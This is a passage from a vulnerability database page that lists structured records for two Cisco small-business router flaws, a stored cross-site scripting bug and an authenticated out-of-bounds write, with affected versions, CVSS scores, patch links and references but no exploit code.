All the vulnerabilites related to Cisco - RV215W Wireless-N VPN Router
var-202101-0794
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0794", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "cve": "CVE-2021-1152", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2021-1152", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CNVD-2021-41162", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "VHN-374206", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 1.7, "id": "CVE-2021-1152", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "trust": 2.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.8, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2021-1152", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "High", "scope": "Changed", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1152", "trust": 1.0, "value": "MEDIUM" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1152", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2021-1152", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2021-41162", "trust": 0.6, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-202101-1026", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-374206", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "db": "NVD", "id": "CVE-2021-1152" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1152" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1152", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002669", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41162", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0141", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-1026", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374206", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "id": "VAR-202101-0794", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" } ], "trust": 1.363373685 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" } ] }, "last_update_date": "2024-11-23T21:34:59.648000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-stored-xss-LPTQ3EQC", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41162)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272206" }, { "title": "Multiple Cisco Fixes for product cross-site scripting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139429" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNNVD", "id": "CNNVD-202101-1026" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.1 }, { "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374206" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1152" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41162" }, { "db": "VULHUB", "id": "VHN-374206" }, { "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "db": "NVD", "id": "CVE-2021-1152" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41162" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374206" }, { "date": "2021-09-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "date": "2021-01-13T22:15:15.303000", "db": "NVD", "id": "CVE-2021-1152" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41162" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374206" }, { "date": "2021-09-29T05:47:00", "db": "JVNDB", "id": "JVNDB-2021-002669" }, { "date": "2021-01-20T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1026" }, { "date": "2024-11-21T05:43:42.203000", "db": "NVD", "id": "CVE-2021-1152" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1026" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002669" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1026" } ], "trust": 0.6 } }
var-202101-0776
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0776", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "cve": "CVE-2021-1216", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1216", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41171", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374270", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1216", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1216", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1216", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1216", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1216", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41171", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-1078", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374270", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "db": "NVD", "id": "CVE-2021-1216" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W", "sources": [ { "db": "NVD", "id": "CVE-2021-1216" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1216", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002630", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41171", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-1078", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374270", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "id": "VAR-202101-0776", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" } ] }, "last_update_date": "2024-11-23T21:34:54.458000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41171)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272296" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": 